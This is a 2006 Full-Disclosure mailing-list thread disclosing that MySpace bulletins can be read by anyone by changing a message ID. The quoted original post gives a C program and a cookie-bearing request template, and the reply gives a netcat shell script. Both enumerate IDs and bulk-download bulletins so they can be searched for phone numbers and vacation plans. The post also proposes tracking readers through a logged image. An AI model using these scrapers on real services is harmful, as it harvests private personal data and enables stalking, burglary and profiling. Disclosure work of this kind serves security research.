Re: Data Mining Myspace Bulletins

["Morgan Reed" <morgan.s.reed () gmail com>]

Or if you must use netcat don't use system() write a shell script.

================================================

#!/bin/sh

if [ $# != 2 ]; then
       echo "Usage: "$0" <start> <end>"
       exit 1
fi

if [ $1 -gt $2 ]; then
       echo "end must be greater than start"
       exit 2
fi

recs=$(( $2-$1+1 ))

for (( i=0; i<recs; i++ )); do
       echo "GET
/index.cfm?fuseaction=bulletin.read&messageID="$(($i+$1))".lf
HTTP/1.1" > new_request.txt
       cat request.txt >> new_request.txt
       echo "Downloading bulletin #"$(($i))" of "$(($recs - 1))"
"$(($recs-$i-1))" remaining"
       nc -w2 bulletin.myspace.com 80 < new_request.txt >
bulletin/$(($i+$1)).lf.html
done

================================================

Untested 5 minute hack but should work identically to the C PoC.


On 7/2/06, GroundZero Security <fd () g-0 org> wrote:
> Couldn't you have used sockets? Its just a simple connect()
> whats the big deal..Using netcat trusting the env and using system() is baaad :-)
>
> ----- Original Message -----
> From: "John Hackenger" <stderr () pandora-security com>
> To: <full-disclosure () lists grok org uk>
> Sent: Saturday, July 01, 2006 12:38 AM
> Subject: [Full-disclosure] Data Mining Myspace Bulletins
>
>
> > Myspace Bulletins: The good, the bad, and the ugly
> >
> > Data Mining Myspace, a case study
> >
> > Author: stderr (stderr () pandora-security com)
> > http://stderr.linuxinit.net
> >
> > Original release:
> > http://www.pandora-security.com
> >
> > ------------------------------------------------------
> >
> > 1. Abstract
> >
> > We all know about myspace.com, and I'll go ahead and admit
> > that I actually have an account to keep up with friends.
> > Myspace is full of a bunch of idiots, but it can be a great
> > tool for keeping up with people... when used properly.
> >
> > Myspace has long been a hacker playground, you may remember
> > the infamous "Samy is my hero" "worm". The "worm" took advantage
> > of several poor input validation techniques which were being
> > employed. Each person that went to a page with his script in it,
> > automatically sent him a friend request. After this alarming
> > stunt, Myspace fixed a lot of the injection vulnerabilities.
> >
> > ------------------------------------------------------
> >
> > 2. Introduction to Bulletins
> >
> > On Myspace, you can send "bulletins" which are sent to all
> > of the friends on your list. That way if you're going on
> > vacation or something, you can let ALL of your friends know
> > what's happening by sending only one message. Most people
> > assume that only their friends can read the bulletins they
> > post... they are sadly mistaken.
> >
> > When you open up a bulletin, you go to a url like the following.
> >
> > http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.read&messageID=111111111
> >
> > Yes, you guessed it. If you change the messageID number,
> > you can view any bulletin on Myspace that hasn't yet
> > expired. Now, if we could just collect a ton of bulletins,
> > then we could surely find some juicy information like
> > cell phone numbers, when people are leaving for vacation,
> > where they're going... the list goes on and on.
> >
> > The implementation of bulletins so that everyone can view them
> > may be intentional, but most people assume that bulletins are
> > only readable by friends. Because of this belief, many people
> > post personal details in bulletins, never expecting people
> > like you to read them. The mere existence of the "Delete from
> > friends" button implies that only friends should be able to
> > read your bulletins.
> >
> > ------------------------------------------------------
> >
> > 3. Mining the data
> >
> > I was able to whip together a small C program that generates
> > urls, retrieves the bulletin, and saves the html to a file.
> > Once all of the data has been downloaded, it's easy to parse
> > through using a tool like grep.
> >
> > In order for this program to work, you need to download a
> > tool called 'netcat'. You will also need to get your cookie
> > once you're logged into myspace, so that you can view the
> > bulletins.
> >
> > First of all, let's create a new file named "request.txt"
> > The contents should look something like this, but you'll need
> > to change the cookie to match yours.
> >
> > =======================================================
> >
> > Host: bulletin.myspace.com
> > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13)
> > Gecko/20060414
> > Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html
> > ;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
> > Accept-Language: en-us,en;q=0.5
> > Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> > Keep-Alive: 300
> > Connection: keep-alive
> > Cookie: TIMEZONE=3;
> > ODZDBXZG9tY#luPXXhaG#vJSRsZD1DXEWQSASLKJFLAJF;ODIJ;AEIJOIJDFOIAJEDKL124DADK
> > ADS;IFJO;IEAJOIFEA89U;FIO;23A;OIJDSJAOIJOIEJWAIJLDOISJFOIJ39812H12O8JAW098320AJDSLKJ32AOJ12LIJ4
> > A;OIJ;S;OAIJMCOISJAO8JOIRA2J38U2398JIOAJDFKANKJCNLUIHA8W734HLAIL2L3ANUHDLUIAHF87Y3LAHAKDJHF8L83
> > 5PVVTJmRhdGluZz0wJmRyaW5rZXI9MCZlZHVjYXRpb25pZD0x;
> > NGUserID=a258ca5-2341-1231956342-6;
> > MYSPACE=myspace; AUTOSONGPLAY=0;
> > UNIQUELOGINTAKEOVER_10207218=%7Bts%20%272006-06-2df%047%3A32%x
> > A18%27%7D; MSCOUNTRY=US; FRNDIDxr2g=55555555; rsi_want=0;
> > COUNTRYCODE=MFMGCisGAQQBgjdYA7GgRTBDB
> > gorBgEEAYI3WAMBoDUwMwIDAgABAgJmAwICAMAECHndruAVl3qwBBBgdJZ9K7N%2F34aRlhOz2UArBAi%2BqGfSVTRm7w%3
> > D%3D; MSCulture=IP=127.0.0.1&IPCulture=en-US&PreferredCulture=en-US&Country=US;
> > MYUSERINFO=saoijaoi;joiewjaoijdosiajdklajfoijADFJIEAJKDJFIJIEAdlkjlijelaijalidjflijaslijldsijli
> > AIDFJIAEwjfoiajdfeAIJDfAOJeagEOJeAJDalkjdadfAEJaijadlijfdilakmckj85423alkjdklafjdlkajdklajlkjea
> > aDJFAILJJae'oifja;3o4ijmaidjalkfmaijkladfjalkjfioeajlkmdmc,jkjiojoia3wjiojfoiejaoija;odijflkjda
> > ALOAJKEIOAJF3ea:LKfoaidjiajsioajlk3jaijdkfhfkjghncx,jlkjaweoijroiajoijadsljfdlksajfij32lja;dljf
> > aDJFOA:#oKkdjflkaj;ijIOJilj;ioje;ioHiuhNKJhUGJJikhiugygGTYFTJHKHIUgyuhihiugI:HUgugyfTHDGfyjgfff
> > 2FADFaEFeaDfagFhGHggFgadcAweadddafdasfeafgeaeageaijlkfjai;hj;JIOJlihluhkHUIHKhuilgliuHLIUHLHhhh
> > h0DSAFOOJaewoi'jfa;ilj;oi:IOnjiehjioh;iH:IH;iohi;hg;juGYFyjfyjflukhaljdkfaejoijlajdlifjealijddd
> > WIaOJFoa;ejklijdaFOJEaIjo:IJEAOIJEoajf:EOJAjdailjdf;ilaj;lijioj;oije;aojojaoijoiej;oaijo;ij;oij
> > hNaoijao;ijdoifj;ckxx,jaiojeifajkjnaklhugi834829ijljadflkj3alijadlkjfaeljaclijeakjdoijgealijdcd
> > Fsaijo;ij3;oaij;oijod;iasj;oijx90asjoij3alij;ioadjf;iojeo;iaj;oij;dkjfkdjlakjdlska;
> > LASTUSERCLICK=%7bts+'2006-06-21+15%3a64%3a52'%1f;
> > CAPTCHA=02236762-de4c-133a-a5e2-ff558427f513
> >
> > =======================================================
> >
> > Now that you have the request.txt file all setup, let's go
> > ahead and compile the C program that will mine the data.
> >
> > scan.c
> >
> > =======================================================
> >
> > /*************************************************
> >  * scan.c -- Myspace bulletin miner              *
> >  * Author: stderr (stderr () pandora-security com)  *
> >  * Usage: ./scan 1164147677 1164147678           *
> >  * The ending ID should be greater than the      *
> >  * starting ID, that or you could always         *
> >  * reverse the loop in the body of the program.  *
> >  *                                               *
> >  * (Note) I'm sure this could be done a lot more *
> >  * elegantly, maybe even with perl or something  *
> >  * But... this is just a proof of concept, so..  *
> >  * No hating :)                                  *
> >  *************************************************/
> >
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> >
> > void usage(char *name);
> >
> > int main(int argc, char *argv[])
> > {
> >     double id, s_id, e_id;
> >     char x, url[256];
> >     FILE *in_file, *out_file;
> >
> >     if (argc != 3) {
> >        usage(argv[0]);
> >        exit(1);
> >     }
> >
> >     s_id = atoi(argv[1]);
> >     e_id = atoi(argv[2]);
> >
> >     if (s_id >= e_id) {
> >        printf("The ending ID must be greater than the starting ID\n");
> >        exit(1);
> >     }
> >
> >     for (id = s_id; id < e_id; ++id) {
> >         in_file = fopen("request.txt","r");
> >         out_file = fopen("new_request.txt","w");
> >
> >         fprintf(out_file,"GET
> > /index.cfm?fuseaction=bulletin.read&messageID=%0.lf HTTP/1.1\n",id);
> >         while ((x=fgetc(in_file)) != EOF)
> >               fputc(x,out_file);
> >         fclose(in_file);
> >         fclose(out_file);
> >
> >         printf("Downloading Bulletin #%0.lf ... %0.lf bulletins
> > left.\r",id, e_id-id);
> >         sprintf(url,"nc -w2 bulletin.myspace.com 80 < new_request.txt
> > > bulletin/%0.lf.html\n",id);
> >         system(url);
> >     }
> >     system("pause");
> >     return 0;
> > }
> >
> > void usage(char *name)
> > {
> >      printf("%s <start message id> <ending message id>\n",name);
> > }
> >
> > =======================================================
> >
> > Now compile the program, and run something like this...
> >
> > ./scan 4264287677 4264287777
> >
> > (Note) Before running the program, you'll need to make a directory
> > called "bulletin" so that the program will save the bulletins to
> > their own directory. If you don't like that setup, then change the
> > code.
> >
> > You should now have a bunch of bulletins downloaded, now just grep
> > through the the "bulletin" directory for the data that you're looking
> > for.
> >
> > ------------------------------------------------------
> >
> > 4. More fun with Bulletins
> >
> > If you have a Myspace account, you've undoubtedly encountered a lot of spam
> > bulletins. Another idea to play with bulletins is be to add an image
> > in the bulletin, and start forwarding it around. The image that's pointed
> > to should be on a server where you have access to the logs. Once people
> > start circulating the bulletin, it's possible to see how many times it's
> > been forwarded by looking at the referrer. To the best of my knowledge
> > there's no way of getting the name of each person that reads the
> > bulletin, but you will obviously have the name of each person that
> > forwards the bulletin.
> >
> > ------------------------------------------------------
> >
> > 5. Closing Statements
> >
> > Whether this is a "flaw" that is going to be closed remains to be seen.
> > As always, just be careful with the information you're posting on the
> > internet. You never know who's watching.
> >
> > Shouts: zipk0der, XPlicit, exvitel, Sonic, and Darcy
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


--
"They that can give up essential liberty to obtain a little temporary
safety deserve neither liberty nor safety."
-- Benjamin Franklin, 1759

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/